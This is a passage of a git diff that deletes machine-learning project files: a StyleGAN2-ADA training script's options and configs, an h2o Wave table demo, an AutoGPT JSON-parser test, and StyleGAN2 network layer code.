training_set.name - print('desc: ', desc) - del training_set # conserve memory - except IOError as err: - raise UserError(f'--data: {err}') - - if square: - desc += '-square' - else: - desc += '-rectangle' - - if cond is None: - cond = False - assert isinstance(cond, bool) - if cond: - if not args.training_set_kwargs.use_labels: - raise UserError( - '--cond=True requires labels specified in dataset.json') - desc += '-cond' - else: - args.training_set_kwargs.use_labels = False - - if subset is not None: - assert isinstance(subset, int) - if not 1 <= subset <= args.training_set_kwargs.max_size: - raise UserError( - f'--subset must be between 1 and {args.training_set_kwargs.max_size}') - desc += f'-subset{subset}' - if subset < args.training_set_kwargs.max_size: - args.training_set_kwargs.max_size = subset - args.training_set_kwargs.random_seed = args.random_seed - - if mirror is None: - mirror = False - assert isinstance(mirror, bool) - if mirror: - desc += '-mirror' - args.training_set_kwargs.xflip = True - - # ------------------------------------ - # Base config: cfg, gamma, kimg, batch - # ------------------------------------ - - if cfg is None: - cfg = 'auto' - assert isinstance(cfg, str) - desc += f'-{cfg}' - - cfg_specs = { - 'auto': dict(ref_gpus=-1, kimg=25000, mb=-1, mbstd=-1, fmaps=-1, lrate=-1, gamma=-1, ema=-1, ramp=0.05, map=2), - # Populated dynamically based on resolution and GPU count. - 'shhq': dict(ref_gpus=-1, kimg=25000, mb=-1, mbstd=-1, fmaps=-1, lrate=-1, gamma=-1, ema=-1, ramp=0.05, map=8), - # Uses mixed-precision, unlike the original StyleGAN2. - 'stylegan2': dict(ref_gpus=8, kimg=25000, mb=32, mbstd=4, fmaps=1, lrate=0.002, gamma=10, ema=10, ramp=None, map=8), - 'paper256': dict(ref_gpus=8, kimg=25000, mb=64, mbstd=8, fmaps=0.5, lrate=0.0025, gamma=1, ema=20, ramp=None, map=8), - 'paper512': dict(ref_gpus=8, kimg=25000, mb=64, mbstd=8, fmaps=1, lrate=0.0025, gamma=0.5, ema=20, ramp=None, map=8), - 'paper1024': dict(ref_gpus=8, kimg=25000, mb=32, mbstd=4, fmaps=1, lrate=0.002, gamma=2, ema=10, ramp=None, map=8), - 'cifar': dict(ref_gpus=2, kimg=100000, mb=64, mbstd=32, fmaps=1, lrate=0.0025, gamma=0.01, ema=500, ramp=0.05, map=2), - } - - assert cfg in cfg_specs - spec = dnnlib.EasyDict(cfg_specs[cfg]) - if cfg == 'auto' or cfg == 'shhq': - desc += f'{gpus:d}' - spec.ref_gpus = gpus - res = args.training_set_kwargs.resolution - # keep gpu memory consumption at bay - spec.mb = max(min(gpus * min(4096 // res, 32), 64), gpus) - # other hyperparams behave more predictably if mbstd group size remains fixed - spec.mbstd = min(spec.mb // gpus, 4) - spec.fmaps = 1 if res >= 512 else 0.5 - spec.lrate = 0.002 if res >= 1024 else 0.0025 - spec.gamma = 0.0002 * (res ** 2) / spec.mb # heuristic formula - spec.ema = spec.mb * 10 / 32 - - args.G_kwargs = dnnlib.EasyDict(class_name='training.networks.Generator', z_dim=512, w_dim=512, - mapping_kwargs=dnnlib.EasyDict(), synthesis_kwargs=dnnlib.EasyDict(), square=square) - args.D_kwargs = dnnlib.EasyDict(class_name='training.networks.Discriminator', block_kwargs=dnnlib.EasyDict( - ), mapping_kwargs=dnnlib.EasyDict(), epilogue_kwargs=dnnlib.EasyDict(), square=square) - args.G_kwargs.synthesis_kwargs.channel_base = args.D_kwargs.channel_base = int( - spec.fmaps * 32768) - args.G_kwargs.synthesis_kwargs.channel_max = args.D_kwargs.channel_max = 512 - args.G_kwargs.mapping_kwargs.num_layers = spec.map - # enable mixed-precision training - args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 4 - # clamp activations to avoid float16 overflow - args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = 256 - args.D_kwargs.epilogue_kwargs.mbstd_group_size = spec.mbstd - - args.G_opt_kwargs = dnnlib.EasyDict( - class_name='torch.optim.Adam', lr=spec.lrate, betas=[0, 0.99], eps=1e-8) - args.D_opt_kwargs = dnnlib.EasyDict( - class_name='torch.optim.Adam', lr=spec.lrate, betas=[0, 0.99], eps=1e-8) - args.loss_kwargs = dnnlib.EasyDict( - class_name='training.loss.StyleGAN2Loss', r1_gamma=spec.gamma) - - args.total_kimg = spec.kimg - args.batch_size = spec.mb - args.batch_gpu = spec.mb // spec.ref_gpus - args.ema_kimg = spec.ema - args.ema_rampup = spec.ramp - - if cfg == 'cifar': - args.loss_kwargs.pl_weight = 0 # disable path length regularization - args.loss_kwargs.style_mixing_prob = 0 # disable style mixing - args.D_kwargs.architecture = 'orig' # disable residual skip connections - - if gamma is not None: - assert isinstance(gamma, float) - if not gamma >= 0: - raise UserError('--gamma must be non-negative') - desc += f'-gamma{gamma:g}' - args.loss_kwargs.r1_gamma = gamma - - if kimg is not None: - assert isinstance(kimg, int) - if not kimg >= 1: - raise UserError('--kimg must be at least 1') - desc += f'-kimg{kimg:d}' - args.total_kimg = kimg - - if batch is not None: - assert isinstance(batch, int) - if not (batch >= 1 and batch % gpus == 0): - raise UserError( - '--batch must be at least 1 and divisible by --gpus') - desc += f'-batch{batch}' - args.batch_size = batch - args.batch_gpu = batch // gpus - - # --------------------------------------------------- - # Discriminator augmentation: aug, p, target, augpipe - # --------------------------------------------------- - - if aug is None: - aug = 'ada' - else: - assert isinstance(aug, str) - desc += f'-{aug}' - - if aug == 'ada': - args.ada_target = 0.6 - - elif aug == 'noaug': - pass - - elif aug == 'fixed': - if p is None: - raise UserError(f'--aug={aug} requires specifying --p') - - else: - raise UserError(f'--aug={aug} not supported') - - if p is not None: - assert isinstance(p, float) - if aug != 'fixed': - raise UserError('--p can only be specified with --aug=fixed') - if not 0 <= p <= 1: - raise UserError('--p must be between 0 and 1') - desc += f'-p{p:g}' - args.augment_p = p - - if target is not None: - assert isinstance(target, float) - if aug != 'ada': - raise UserError('--target can only be specified with --aug=ada') - if not 0 <= target <= 1: - raise UserError('--target must be between 0 and 1') - desc += f'-target{target:g}' - args.ada_target = target - - assert augpipe is None or isinstance(augpipe, str) - if augpipe is None: - augpipe = 'bgc' - else: - if aug == 'noaug': - raise UserError('--augpipe cannot be specified with --aug=noaug') - desc += f'-{augpipe}' - - augpipe_specs = { - 'blit': dict(xflip=1, rotate90=1, xint=1), - 'geom': dict(scale=1, rotate=1, aniso=1, xfrac=1), - 'color': dict(brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1), - 'filter': dict(imgfilter=1), - 'noise': dict(noise=1), - 'cutout': dict(cutout=1), - 'bg': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1), - 'bgc': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1), - 'bgcf': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1, imgfilter=1), - 'bgcfn': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1, imgfilter=1, noise=1), - 'bgcfnc': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1, imgfilter=1, noise=1, cutout=1), - 'body': dict(xflip=1, rotate90=0, xint=1, scale=1, rotate=0, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1) - } - - assert augpipe in augpipe_specs - if aug != 'noaug': - args.augment_kwargs = dnnlib.EasyDict( - class_name='training.augment.AugmentPipe', **augpipe_specs[augpipe]) - - # ---------------------------------- - # Transfer learning: resume, freezed - # ---------------------------------- - - resume_specs = { - 'ffhq256': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res256-mirror-paper256-noaug.pkl', - 'ffhq512': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res512-mirror-stylegan2-noaug.pkl', - 'ffhq1024': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res1024-mirror-stylegan2-noaug.pkl', - 'celebahq256': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/celebahq-res256-mirror-paper256-kimg100000-ada-target0.5.pkl', - 'lsundog256': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/lsundog-res256-paper256-kimg100000-noaug.pkl', - } - - assert resume is None or isinstance(resume, str) - if resume is None: - resume = 'noresume' - elif resume == 'noresume': - desc += '-noresume' - elif resume in resume_specs: - desc += f'-resume{resume}' - args.resume_pkl = resume_specs[resume] # predefined url - else: - desc += '-resumecustom' - args.resume_pkl = resume # custom path or url - - if resume != 'noresume': - args.ada_kimg = 100 # make ADA react faster at the beginning - args.ema_rampup = None # disable EMA rampup - - if freezed is not None: - assert isinstance(freezed, int) - if not freezed >= 0: - raise UserError('--freezed must be non-negative') - desc += f'-freezed{freezed:d}' - args.D_kwargs.block_kwargs.freeze_layers = freezed - - # ------------------------------------------------- - # Performance options: fp32, nhwc, nobench, workers - # ------------------------------------------------- - - if fp32 is None: - fp32 = False - assert isinstance(fp32, bool) - if fp32: - args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 0 - args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = None - - if nhwc is None: - nhwc = False - assert isinstance(nhwc, bool) - if nhwc: - args.G_kwargs.synthesis_kwargs.fp16_channels_last = args.D_kwargs.block_kwargs.fp16_channels_last = True - - if nobench is None: - nobench = False - assert isinstance(nobench, bool) - if nobench: - args.cudnn_benchmark = False - - if allow_tf32 is None: - allow_tf32 = False - assert isinstance(allow_tf32, bool) - if allow_tf32: - args.allow_tf32 = True - - if workers is not None: - assert isinstance(workers, int) - if not workers >= 1: - raise UserError('--workers must be at least 1') - args.data_loader_kwargs.num_workers = workers - - return desc, args - -# ---------------------------------------------------------------------------- - - -def subprocess_fn(rank, args, temp_dir): - dnnlib.util.Logger(file_name=os.path.join( - args.run_dir, 'log.txt'), file_mode='a', should_flush=True) - - # Init torch.distributed. - if args.num_gpus > 1: - init_file = os.path.abspath(os.path.join( - temp_dir, '.torch_distributed_init')) - if os.name == 'nt': - init_method = 'file:///' + init_file.replace('\\', '/') - torch.distributed.init_process_group( - backend='gloo', init_method=init_method, rank=rank, world_size=args.num_gpus) - else: - init_method = f'file://{init_file}' - torch.distributed.init_process_group( - backend='nccl', init_method=init_method, rank=rank, world_size=args.num_gpus) - - # Init torch_utils. - sync_device = torch.device('cuda', rank) if args.num_gpus > 1 else None - training_stats.init_multiprocessing(rank=rank, sync_device=sync_device) - if rank != 0: - custom_ops.verbosity = 'none' - - # Execute training loop. - training_loop.training_loop(rank=rank, **args) - -# ---------------------------------------------------------------------------- - - -class CommaSeparatedList(click.ParamType): - name = 'list' - - def convert(self, value, param, ctx): - _ = param, ctx - if value is None or value.lower() == 'none' or value == '': - return [] - return value.split(',') - -# ---------------------------------------------------------------------------- - - -@click.command() -@click.pass_context -# General options. -@click.option('--outdir', help='Where to save the results', required=True, metavar='DIR') -@click.option('--gpus', help='Number of GPUs to use [default: 1]', type=int, metavar='INT') -@click.option('--snap', help='Snapshot interval [default: 50 ticks]', type=int, metavar='INT') -@click.option('--metrics', help='Comma-separated list or "none" [default: fid50k_full]', type=CommaSeparatedList()) -@click.option('--seed', help='Random seed [default: 0]', type=int, metavar='INT') -@click.option('-n', '--dry-run', help='Print training options and exit', is_flag=True) -# Dataset. -@click.option('--data', help='Training data (directory or zip)', metavar='PATH', required=True) -@click.option('--cond', help='Train conditional model based on dataset labels [default: false]', type=bool, metavar='BOOL') -@click.option('--subset', help='Train with only N images [default: all]', type=int, metavar='INT') -@click.option('--mirror', help='Enable dataset x-flips [default: false]', type=bool, metavar='BOOL') -@click.option('--square', help='True for square, False for rectangle', type=bool, metavar='BOOL', default=False) -# Base config. -@click.option('--cfg', help='Base config [default: auto]', type=click.Choice(['auto', 'stylegan2', 'paper256', 'paper512', 'paper1024', 'cifar', 'shhq'])) -@click.option('--gamma', help='Override R1 gamma', type=float) -@click.option('--kimg', help='Override training duration', type=int, metavar='INT') -@click.option('--batch', help='Override batch size', type=int, metavar='INT') -# Discriminator augmentation. -@click.option('--aug', help='Augmentation mode [default: ada]', type=click.Choice(['noaug', 'ada', 'fixed'])) -@click.option('--p', help='Augmentation probability for --aug=fixed', type=float) -@click.option('--target', help='ADA target value for --aug=ada', type=float) -@click.option('--augpipe', help='Augmentation pipeline [default: bgc]', type=click.Choice(['blit', 'geom', 'color', 'filter', 'noise', 'cutout', 'bg', 'bgc', 'bgcf', 'bgcfn', 'bgcfnc', 'body'])) -# Transfer learning. -@click.option('--resume', help='Resume training [default: noresume]', metavar='PKL') -@click.option('--freezed', help='Freeze-D [default: 0 layers]', type=int, metavar='INT') -# Performance options. -@click.option('--fp32', help='Disable mixed-precision training', type=bool, metavar='BOOL') -@click.option('--nhwc', help='Use NHWC memory format with FP16', type=bool, metavar='BOOL') -@click.option('--nobench', help='Disable cuDNN benchmarking', type=bool, metavar='BOOL') -@click.option('--allow-tf32', help='Allow PyTorch to use TF32 internally', type=bool, metavar='BOOL') -@click.option('--workers', help='Override number of DataLoader workers', type=int, metavar='INT') -def main(ctx, outdir, dry_run, **config_kwargs): - """Train a GAN using the techniques described in the paper - "Training Generative Adversarial Networks with Limited Data". - - Examples: - - \b - # Train with custom dataset using 1 GPU. - python train.py --outdir=~/training-runs --data=~/mydataset.zip --gpus=1 - - \b - # Train class-conditional CIFAR-10 using 2 GPUs. - python train.py --outdir=~/training-runs --data=~/datasets/cifar10.zip \\ - --gpus=2 --cfg=cifar --cond=1 - - \b - # Transfer learn MetFaces from FFHQ using 4 GPUs. - python train.py --outdir=~/training-runs --data=~/datasets/metfaces.zip \\ - --gpus=4 --cfg=paper1024 --mirror=1 --resume=ffhq1024 --snap=10 - - \b - # Reproduce original StyleGAN2 config F. - python train.py --outdir=~/training-runs --data=~/datasets/ffhq.zip \\ - --gpus=8 --cfg=stylegan2 --mirror=1 --aug=noaug - - \b - Base configs (--cfg): - auto Automatically select reasonable defaults based on resolution - and GPU count. Good starting point for new datasets. - stylegan2 Reproduce results for StyleGAN2 config F at 1024x1024. - paper256 Reproduce results for FFHQ and LSUN Cat at 256x256. - paper512 Reproduce results for BreCaHAD and AFHQ at 512x512. - paper1024 Reproduce results for MetFaces at 1024x1024. - cifar Reproduce results for CIFAR-10 at 32x32. - - \b - Transfer learning source networks (--resume): - ffhq256 FFHQ trained at 256x256 resolution. - ffhq512 FFHQ trained at 512x512 resolution. - ffhq1024 FFHQ trained at 1024x1024 resolution. - celebahq256 CelebA-HQ trained at 256x256 resolution. - lsundog256 LSUN Dog trained at 256x256 resolution. - Custom network pickle. - """ - dnnlib.util.Logger(should_flush=True) - - # Setup training options. - try: - run_desc, args = setup_training_loop_kwargs(**config_kwargs) - except UserError as err: - ctx.fail(err) - - # Pick output directory. - prev_run_dirs = [] - if os.path.isdir(outdir): - prev_run_dirs = [x for x in os.listdir( - outdir) if os.path.isdir(os.path.join(outdir, x))] - prev_run_ids = [re.match(r'^\d+', x) for x in prev_run_dirs] - prev_run_ids = [int(x.group()) for x in prev_run_ids if x is not None] - cur_run_id = max(prev_run_ids, default=-1) + 1 - args.run_dir = os.path.join(outdir, f'{cur_run_id:05d}-{run_desc}') - assert not os.path.exists(args.run_dir) - - # Print options. - print() - print('Training options:') - print(json.dumps(args, indent=2)) - print() - print(f'Output directory: {args.run_dir}') - print(f'Training data: {args.training_set_kwargs.path}') - print(f'Training duration: {args.total_kimg} kimg') - print(f'Number of GPUs: {args.num_gpus}') - print(f'Number of images: {args.training_set_kwargs.max_size}') - print(f'Image resolution: {args.training_set_kwargs.resolution}') - print(f'Conditional model: {args.training_set_kwargs.use_labels}') - print(f'Dataset x-flips: {args.training_set_kwargs.xflip}') - print() - - # Dry run? - if dry_run: - print('Dry run; exiting.') - return - - # Create output directory. - print('Creating output directory...') - os.makedirs(args.run_dir, exist_ok=True) - with open(os.path.join(args.run_dir, 'training_options.json'), 'wt') as f: - json.dump(args, f, indent=2) - - # Launch processes. - print('Launching processes...') - torch.multiprocessing.set_start_method('spawn') - with tempfile.TemporaryDirectory() as temp_dir: - if args.num_gpus == 1: - subprocess_fn(rank=0, args=args, temp_dir=temp_dir) - else: - torch.multiprocessing.spawn(fn=subprocess_fn, args=( - args, temp_dir), nprocs=args.num_gpus) - -# ---------------------------------------------------------------------------- - - -if __name__ == "__main__": - main() # pylint: disable=no-value-for-parameter - -# ---------------------------------------------------------------------------- diff --git a/spaces/h2oai/wave-tour/examples/table_menu.py b/spaces/h2oai/wave-tour/examples/table_menu.py deleted file mode 100644 index a39127015da42b2f407b3ace6d8ae851c0f23ff9..0000000000000000000000000000000000000000 --- a/spaces/h2oai/wave-tour/examples/table_menu.py +++ /dev/null @@ -1,64 +0,0 @@ -# Table / Menu -# Allow group of commands with context menu for each row. -# #table #commands #menu -# --- -from h2o_wave import main, app, Q, ui -from faker import Faker - -fake = Faker() - - -class TableRow: - _id = 0 - - def __init__(self): - TableRow._id += 1 - self.id = f'row_{TableRow._id}' - self.name = f'{fake.first_name()} {fake.last_name()}' - self.details = fake.sentence() - - -def show_table(q) -> None: - q.page['example'] = ui.form_card(box='1 1 4 4', items=[ - ui.table( - name='table', - columns=[ - ui.table_column(name='name', label='Name'), - ui.table_column( - name='actions', label='Actions', - cell_type=ui.menu_table_cell_type(name='commands', commands=[ - ui.command(name='details', label='Details'), - ui.command(name='delete', label='Delete'), - ]) - ) - ], - rows=[ui.table_row(name=r.id, cells=[r.name]) for r in q.client.rows] - ) - ]) - - -@app('/demo') -async def serve(q: Q): - if not q.app.initialized: - q.app.rows = [TableRow() for _ in range(3)] - q.app.initialized = True - if not q.client.initialized: - q.client.rows = q.app.rows - show_table(q) - q.client.initialized = True - - if q.args.delete: - q.client.rows = [row for row in q.client.rows if row.id != q.args.delete] - q.page['example'].table.rows = [ui.table_row(name=r.id, cells=[r.name]) for r in q.client.rows] - if q.args.details: - for row in q.client.rows: - if row.id == q.args.details: - q.page['example'] = ui.form_card(box='1 1 4 4', items=[ - ui.text(name='details', content=row.details), - ui.button(name='back', label='Back') - ]) - break - if q.args.back: - show_table(q) - - await q.page.save() diff --git a/spaces/hamelcubsfan/AutoGPT/tests/test_json_parser.py b/spaces/hamelcubsfan/AutoGPT/tests/test_json_parser.py deleted file mode 100644 index 41c90a6f66c0b0468f1443de80033cc4f268eca0..0000000000000000000000000000000000000000 --- a/spaces/hamelcubsfan/AutoGPT/tests/test_json_parser.py +++ /dev/null @@ -1,111 +0,0 @@ -import unittest - -import tests.context -from autogpt.json_utils.json_fix_llm import fix_and_parse_json - - -class TestParseJson(unittest.TestCase): - def test_valid_json(self): - # Test that a valid JSON string is parsed correctly - json_str = '{"name": "John", "age": 30, "city": "New York"}' - obj = fix_and_parse_json(json_str) - self.assertEqual(obj, {"name": "John", "age": 30, "city": "New York"}) - - def test_invalid_json_minor(self): - # Test that an invalid JSON string can be fixed with gpt - json_str = '{"name": "John", "age": 30, "city": "New York",}' - with self.assertRaises(Exception): - fix_and_parse_json(json_str, try_to_fix_with_gpt=False) - - def test_invalid_json_major_with_gpt(self): - # Test that an invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = 'BEGIN: "name": "John" - "age": 30 - "city": "New York" :END' - with self.assertRaises(Exception): - fix_and_parse_json(json_str, try_to_fix_with_gpt=False) - - def test_invalid_json_major_without_gpt(self): - # Test that a REALLY invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = 'BEGIN: "name": "John" - "age": 30 - "city": "New York" :END' - # Assert that this raises an exception: - with self.assertRaises(Exception): - fix_and_parse_json(json_str, try_to_fix_with_gpt=False) - - def test_invalid_json_leading_sentence_with_gpt(self): - # Test that a REALLY invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = """I suggest we start by browsing the repository to find any issues that we can fix. - -{ - "command": { - "name": "browse_website", - "args":{ - "url": "https://github.com/Torantulino/Auto-GPT" - } - }, - "thoughts": - { - "text": "I suggest we start browsing the repository to find any issues that we can fix.", - "reasoning": "Browsing the repository will give us an idea of the current state of the codebase and identify any issues that we can address to improve the repo.", - "plan": "- Look through the repository to find any issues.\n- Investigate any issues to determine what needs to be fixed\n- Identify possible solutions to fix the issues\n- Open Pull Requests with fixes", - "criticism": "I should be careful while browsing so as not to accidentally introduce any new bugs or issues.", - "speak": "I will start browsing the repository to find any issues we can fix." - } -}""" - good_obj = { - "command": { - "name": "browse_website", - "args": {"url": "https://github.com/Torantulino/Auto-GPT"}, - }, - "thoughts": { - "text": "I suggest we start browsing the repository to find any issues that we can fix.", - "reasoning": "Browsing the repository will give us an idea of the current state of the codebase and identify any issues that we can address to improve the repo.", - "plan": "- Look through the repository to find any issues.\n- Investigate any issues to determine what needs to be fixed\n- Identify possible solutions to fix the issues\n- Open Pull Requests with fixes", - "criticism": "I should be careful while browsing so as not to accidentally introduce any new bugs or issues.", - "speak": "I will start browsing the repository to find any issues we can fix.", - }, - } - # Assert that this raises an exception: - self.assertEqual( - fix_and_parse_json(json_str, try_to_fix_with_gpt=False), good_obj - ) - - def test_invalid_json_leading_sentence_with_gpt(self): - # Test that a REALLY invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = """I will first need to browse the repository (https://github.com/Torantulino/Auto-GPT) and identify any potential bugs that need fixing. I will use the "browse_website" command for this. - -{ - "command": { - "name": "browse_website", - "args":{ - "url": "https://github.com/Torantulino/Auto-GPT" - } - }, - "thoughts": - { - "text": "Browsing the repository to identify potential bugs", - "reasoning": "Before fixing bugs, I need to identify what needs fixing. I will use the 'browse_website' command to analyze the repository.", - "plan": "- Analyze the repository for potential bugs and areas of improvement", - "criticism": "I need to ensure I am thorough and pay attention to detail while browsing the repository.", - "speak": "I am browsing the repository to identify potential bugs." - } -}""" - good_obj = { - "command": { - "name": "browse_website", - "args": {"url": "https://github.com/Torantulino/Auto-GPT"}, - }, - "thoughts": { - "text": "Browsing the repository to identify potential bugs", - "reasoning": "Before fixing bugs, I need to identify what needs fixing. I will use the 'browse_website' command to analyze the repository.", - "plan": "- Analyze the repository for potential bugs and areas of improvement", - "criticism": "I need to ensure I am thorough and pay attention to detail while browsing the repository.", - "speak": "I am browsing the repository to identify potential bugs.", - }, - } - # Assert that this raises an exception: - self.assertEqual( - fix_and_parse_json(json_str, try_to_fix_with_gpt=False), good_obj - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/hamzapehlivan/StyleRes/models/stylegan2.py b/spaces/hamzapehlivan/StyleRes/models/stylegan2.py deleted file mode 100644 index 7c87996e44e507c5262233eeb38cdb3bf89310ab..0000000000000000000000000000000000000000 --- a/spaces/hamzapehlivan/StyleRes/models/stylegan2.py +++ /dev/null @@ -1,965 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Network architectures from the paper -"Analyzing and Improving the Image Quality of StyleGAN". -Matches the original implementation of configs E-F by Karras et al. at -https://github.com/NVlabs/stylegan2/blob/master/training/networks_stylegan2.py""" - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from .torch_utils import misc -from .torch_utils.ops import conv2d_resample -from .torch_utils.ops import upfirdn2d -from .torch_utils.ops import bias_act -from .torch_utils.ops import fma - -#---------------------------------------------------------------------------- - - -def normalize_2nd_moment(x, dim=1, eps=1e-8): - return x * (x.square().mean(dim=dim, keepdim=True) + eps).rsqrt() - -#---------------------------------------------------------------------------- - - -def modulated_conv2d( - x, # Input tensor of shape [batch_size, in_channels, in_height, in_width]. - weight, # Weight tensor of shape [out_channels, in_channels, kernel_height, kernel_width]. - styles, # Modulation coefficients of shape [batch_size, in_channels]. - noise = None, # Optional noise tensor to add to the output activations. - up = 1, # Integer upsampling factor. - down = 1, # Integer downsampling factor. - padding = 0, # Padding with respect to the upsampled image. - resample_filter = None, # Low-pass filter to apply when resampling activations. Must be prepared beforehand by calling upfirdn2d.setup_filter(). - demodulate = True, # Apply weight demodulation? - flip_weight = True, # False = convolution, True = correlation (matches torch.nn.functional.conv2d). - fused_modconv = True, # Perform modulation, convolution, and demodulation as a single fused operation? - weigth_deltas = None -): - batch_size = x.shape[0] - out_channels, in_channels, kh, kw = weight.shape - misc.assert_shape(weight, [out_channels, in_channels, kh, kw]) # [OIkk] - misc.assert_shape(x, [batch_size, in_channels, None, None]) # [NIHW] - misc.assert_shape(styles, [batch_size, in_channels]) # [NI] - - # Pre-normalize inputs to avoid FP16 overflow. - if x.dtype == torch.float16 and demodulate: - weight = weight * (1 / np.sqrt(in_channels * kh * kw) / weight.norm(float('inf'), dim=[1,2,3], keepdim=True)) # max_Ikk - styles = styles / styles.norm(float('inf'), dim=1, keepdim=True) # max_I - - # Calculate per-sample weights and demodulation coefficients. - w = None - dcoefs = None - if demodulate or fused_modconv: - w = weight.unsqueeze(0) # [NOIkk] - #HyperStyle Addition for the Generator - if weigth_deltas is None: - w = w * styles.reshape(batch_size, 1, -1, 1, 1) # [NOIkk] - else: - w = w * (1 + weigth_deltas) * styles.reshape(batch_size, 1, -1, 1, 1) - if demodulate: - dcoefs = (w.square().sum(dim=[2,3,4]) + 1e-8).rsqrt() # [NO] - if demodulate and fused_modconv: - w = w * dcoefs.reshape(batch_size, -1, 1, 1, 1) # [NOIkk] - - # Execute by scaling the activations before and after the convolution. - if not fused_modconv: - x = x * styles.to(x.dtype).reshape(batch_size, -1, 1, 1) - x = conv2d_resample.conv2d_resample(x=x, w=weight.to(x.dtype), f=resample_filter, up=up, down=down, padding=padding, flip_weight=flip_weight) - if demodulate and noise is not None: - x = fma.fma(x, dcoefs.to(x.dtype).reshape(batch_size, -1, 1, 1), noise.to(x.dtype)) - elif demodulate: - x = x * dcoefs.to(x.dtype).reshape(batch_size, -1, 1, 1) - elif noise is not None: - x = x.add_(noise.to(x.dtype)) - return x - - # Execute as one fused op using grouped convolution. - with misc.suppress_tracer_warnings(): # this value will be treated as a constant - batch_size = int(batch_size) - misc.assert_shape(x, [batch_size, in_channels, None, None]) - x = x.reshape(1, -1, *x.shape[2:]) - w = w.reshape(-1, in_channels, kh, kw) - x = conv2d_resample.conv2d_resample(x=x, w=w.to(x.dtype), f=resample_filter, up=up, down=down, padding=padding, groups=batch_size, flip_weight=flip_weight) - x = x.reshape(batch_size, -1, *x.shape[2:]) - if noise is not None: - x = x.add_(noise) - return x - -#---------------------------------------------------------------------------- - - -class FullyConnectedLayer(torch.nn.Module): - def __init__(self, - in_features, # Number of input features. - out_features, # Number of output features. - bias = True, # Apply additive bias before the activation function? - activation = 'linear', # Activation function: 'relu', 'lrelu', etc. - lr_multiplier = 1, # Learning rate multiplier. - bias_init = 0, # Initial value for the additive bias. - ): - super().__init__() - self.in_features = in_features - self.out_features = out_features - self.activation = activation - self.weight = torch.nn.Parameter(torch.randn([out_features, in_features]) / lr_multiplier) - self.bias = torch.nn.Parameter(torch.full([out_features], np.float32(bias_init))) if bias else None - self.weight_gain = lr_multiplier / np.sqrt(in_features) - self.bias_gain = lr_multiplier - - def forward(self, x): - w = self.weight.to(x.dtype) * self.weight_gain - b = self.bias - if b is not None: - b = b.to(x.dtype) - if self.bias_gain != 1: - b = b * self.bias_gain - - if self.activation == 'linear' and b is not None: - x = torch.addmm(b.unsqueeze(0), x, w.t()) - else: - x = x.matmul(w.t()) - x = bias_act.bias_act(x, b, act=self.activation) - return x - - def extra_repr(self): - return f'in_features={self.in_features:d}, out_features={self.out_features:d}, activation={self.activation:s}' - -#---------------------------------------------------------------------------- - - -class Conv2dLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - kernel_size, # Width and height of the convolution kernel. - bias = True, # Apply additive bias before the activation function? - activation = 'linear', # Activation function: 'relu', 'lrelu', etc. - up = 1, # Integer upsampling factor. - down = 1, # Integer downsampling factor. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = None, # Clamp the output to +-X, None = disable clamping. - channels_last = False, # Expect the input to have memory_format=channels_last? - trainable = True, # Update the weights of this layer during training? - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.activation = activation - self.up = up - self.down = down - self.conv_clamp = conv_clamp - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - self.act_gain = bias_act.activation_funcs[activation].def_gain - - memory_format = torch.channels_last if channels_last else torch.contiguous_format - weight = torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format) - bias = torch.zeros([out_channels]) if bias else None - if trainable: - self.weight = torch.nn.Parameter(weight) - self.bias = torch.nn.Parameter(bias) if bias is not None else None - else: - self.register_buffer('weight', weight) - if bias is not None: - self.register_buffer('bias', bias) - else: - self.bias = None - - def forward(self, x, gain=1): - w = self.weight * self.weight_gain - b = self.bias.to(x.dtype) if self.bias is not None else None - flip_weight = (self.up == 1) # slightly faster - x = conv2d_resample.conv2d_resample(x=x, w=w.to(x.dtype), f=self.resample_filter, up=self.up, down=self.down, padding=self.padding, flip_weight=flip_weight) - - act_gain = self.act_gain * gain - act_clamp = 